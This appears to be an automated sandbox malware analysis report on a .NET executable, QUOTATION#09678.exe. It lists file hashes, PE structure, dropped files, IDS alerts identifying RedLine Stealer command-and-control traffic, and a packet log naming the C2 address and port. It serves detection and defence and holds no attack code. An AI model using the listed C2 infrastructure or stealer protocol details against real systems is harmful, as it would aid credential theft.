File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416897179243611
Encrypted:	false
SSDEEP:	6144:Fcifpi6ceLPL9skLmb0mPSWSPtaJG8nAgex285i2MMhA20X4WABlGuNt5+:ii58PSWIZBk2MM6AFBDo
MD5:	B6DD2E9285921DAB6DF1918055EC4BDD
SHA1:	9EC9AC4095429AB7E14DAC7A8F213F734521DC5B
SHA-256:	687D122A53AB5FF71813EBF1FE129B7C6B79912E97BA7EBF623233485999F5BA
SHA-512:	D05DB064BA1B2361A4A5C6AE60BABDB1D0E480E75C7ADED0A240AD50EE952064F69F6B0CEC3813BC4E94488D636C43625B3AFB0E3EE778D628929289292D53D9
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~M..*5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.169002946452535
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION#09678.exe
File size:	3'192'961 bytes
MD5:	9e31f4b7387356ccdc3678a82846f465
SHA1:	f6ef33bc5656e5deb925b2a67574ca6f32ca50e3
SHA256:	2fe5891237c7a50d9ac1d09261e2c6d44098763af1ccc6062531ad31474eba36
SHA512:	d89c49b3d6f5dfd5802056e2eba3ad68adc9f6f49f545ea5b5109467882cd2aa8dbb02922891e3fac915e9b941541afc4e88df34ec8ec48e4039a4721be896a6
SSDEEP:	12288:so2Wjt8nF98h8ILLj2sl1fr0GtZIZMhfvKIVMW:so2Ct80J/AG/IZMhHjn
TLSH:	38E5F0837C13AD53BD010622E9DA7AFD02FE4D4B7CF1A24FCF49AD8196626BC02555B2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...J.5..........."...0..1............... ....@...... ..............................nN1...`................................

File Icon


Icon Hash:	443ad8d4dc581348

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB235CF4A [Sun Sep 28 23:42:02 2064 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x10ea6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x518c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x31a8	0x3200	d8ebf87e86238d685cc680ce70053e26	False	0.569296875	data	5.889750694460738	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x10ea6	0x11000	63818ce2ddf7dd759dac33b81b2bea19	False	0.06192555147058824	data	3.19703904663027	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x6144	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m	0.05199337513308885
RT_GROUP_ICON	0x1696c	0x14	data	1.15
RT_VERSION	0x16980	0x33c	data	0.42995169082125606
RT_MANIFEST	0x16cbc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T18:45:20.316660+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.7	49715	193.70.111.186	13484	TCP
2024-11-12T18:45:22.261325+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.7	49716	TCP
2024-11-12T18:45:25.329488+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	193.70.111.186	13484	192.168.2.7	49715	TCP
2024-11-12T18:45:26.418493+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.7	49715	193.70.111.186	13484	TCP
2024-11-12T18:45:29.802238+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	193.70.111.186	13484	192.168.2.7	49715	TCP
2024-11-12T18:45:29.802238+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	193.70.111.186	13484	192.168.2.7	49715	TCP
2024-11-12T18:45:29.861078+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.7	49779	193.70.111.186	13484	TCP
2024-11-12T18:45:32.040757+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.7	49790	193.70.111.186	13484	TCP
2024-11-12T18:46:02.372584+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.7	49956	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:45:19.422568083 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:19.428502083 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:19.428630114 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:19.456084013 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:19.461036921 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:19.801316977 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:19.806613922 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:20.265125990 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:20.316659927 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:25.324585915 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:25.324843884 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:25.329488039 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:25.333091021 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:26.418301105 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:26.418409109 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:26.418418884 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:26.418428898 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:26.418441057 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:26.418493032 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:26.418580055 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.795618057 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.796118975 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.802237988 CET	13484	49715	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.802350998 CET	49715	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.806952000 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.807111025 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.808284998 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.808494091 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.813229084 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813393116 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.813452959 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813497066 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813508034 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813513994 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.813536882 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813549042 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813561916 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.813585043 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.813605070 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.813612938 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813622952 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813631058 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813663006 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.813668013 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.813708067 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.818708897 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.818722010 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.818778992 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.818798065 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.818902016 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.818912029 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.818978071 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.819220066 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.819237947 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.819288969 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.819303036 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.860860109 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.861078024 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.912749052 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.912818909 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:29.964735031 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:29.964785099 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.016791105 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.016906977 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.064753056 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.064862967 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.112875938 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.112936974 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.164688110 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.164752960 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.212693930 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.212800026 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.261449099 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.261507988 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.312647104 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.312701941 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.360719919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.360852957 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.396684885 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.396869898 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.401894093 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.401952982 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.401959896 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.401972055 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.401983023 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402021885 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402048111 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402060986 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402070999 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402116060 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402117968 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402126074 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402169943 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402180910 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402192116 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402229071 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402232885 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402244091 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402249098 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402281046 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402338982 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402380943 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402453899 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402509928 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402625084 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402714968 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.402735949 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402746916 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.402817965 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.403678894 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.403791904 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.406863928 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.406912088 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.406964064 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407087088 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407097101 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407114029 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407135010 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407155991 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407227993 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407238960 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407248020 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407273054 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407300949 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407301903 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407318115 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407330036 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407340050 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407342911 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407349110 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407381058 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407404900 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407432079 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407442093 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407449961 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407459021 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407476902 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407489061 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407519102 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407541037 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407557964 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407593012 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407601118 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407635927 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407639027 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407649994 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407660961 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407694101 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407702923 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407706976 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407747984 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407752037 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407793999 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407845974 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407885075 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407893896 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407896996 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407903910 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407938957 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407943964 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407949924 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.407968998 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.407990932 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408027887 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408039093 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408080101 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408090115 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408093929 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408101082 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408133984 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408135891 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408143044 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408159971 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408164978 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408174992 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408184052 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408231020 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408241034 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408252001 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408294916 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408348083 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408361912 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408390999 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408413887 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408447027 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408457041 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408466101 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408476114 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408483982 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408483982 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408507109 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408524990 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408567905 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408577919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408586025 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408595085 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408613920 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408628941 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408639908 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408641100 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408684015 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408761024 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408771038 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408801079 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408821106 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408829927 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408839941 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408853054 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408869028 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408878088 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408881903 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408890963 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.408894062 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408921957 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408941984 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.408992052 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409002066 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409010887 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409019947 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409029007 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409040928 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.409061909 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.409077883 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.409531116 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409540892 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409550905 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409559965 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409568071 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409576893 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409585953 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.409586906 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.409605026 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.409629107 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.411881924 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.411900043 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.411915064 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.411952972 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.411974907 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412000895 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412010908 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412019968 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412034988 CET	13484	49779	193.70.111.186	192.168.2.7
